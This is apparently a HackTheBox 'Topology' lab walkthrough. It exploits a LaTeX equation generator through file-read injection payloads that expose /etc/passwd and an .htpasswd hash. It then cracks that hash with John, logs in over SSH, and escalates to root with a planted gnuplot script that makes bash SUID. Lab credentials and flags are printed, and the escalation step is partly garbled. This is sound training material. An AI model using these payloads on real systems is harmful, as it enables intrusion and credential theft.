HACKTHEBOX
Topology
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Creating Host
sudo vim etc/hosts/
add host as 10.10.11.217 topology.htb
Link: http://topology.htb/
Scanning
nmap -A -sV 10.10.11.217
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Visit http://topology.htb/
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Found LaTeX Equation Generator but couldnβt redirect so adding this host name in etc/hosts/
Had no idea about this website so searched Latex equation vulnerabilities and found Formula/CSV/Doc/LaTeX Injection - HackTricks.
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Now I wanted to read files from Latex code generator
command: \input{/etc/passwd}
π‘ It's latex language issue , when I execute command its in "text" mode by adding $ it goes into "math mode" to calculate and execute equations
command: $\input{/etc/passwd}$
As we know /etc/passwd file is used to keep track of every registered user that has access to a system.
command: $\lstinputlisting{/etc/passwd}$
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Nothing much could be found here, letβs scan for some directories.
Scanning for Subdomains
Command: wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Add dev.topology.htb and stats.topology.htb to etc/hosts/
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Now we need to bypass this authenication, as we have seen this domain is running on Apache/2.4.41
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
π Bypass Apache/2.4.41 401 Unauthorized: https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/
Command: $\lstinputlisting{/var/www/dev/.htpasswd}$
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Finally found a Hash as a .PNG file.
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Hash: vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
Hash Cracking using John
command: john --wordlist=/usr/share/wordlists/rockyou.txt hash
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Output ?:calculus20
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
As see in our initial Nmap scan we have few SSH ports open.
Connect to SSH
command: ssh vdaisley@topology.htb
password: calculus20
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
For user flag
command: cat user.txt
Gaining Root access
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Nothing interesting found here, except a executable βpspy64β.
π‘ pspy is a command line tool designed to snoop on processes without need for root permissions.
command: ./pspy64
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More β
command: /opt/gnuplot
command: ls
Output: ls: cannot open directory '.': Permission denied
Create a file within gnuplot dir
command bash-5.0$ nano /opt/gnuplot/root.plt
Reverse Shell - root.plt must contain system βchmod u+sβ
command: bash -p
command: whoami
β root
Obtained the root access. Now, move on to root dir.
command: cd /root
ls
cat root.txt
Here is the root flag
Output: bb6b6780329a215d36126b6d6af62f1f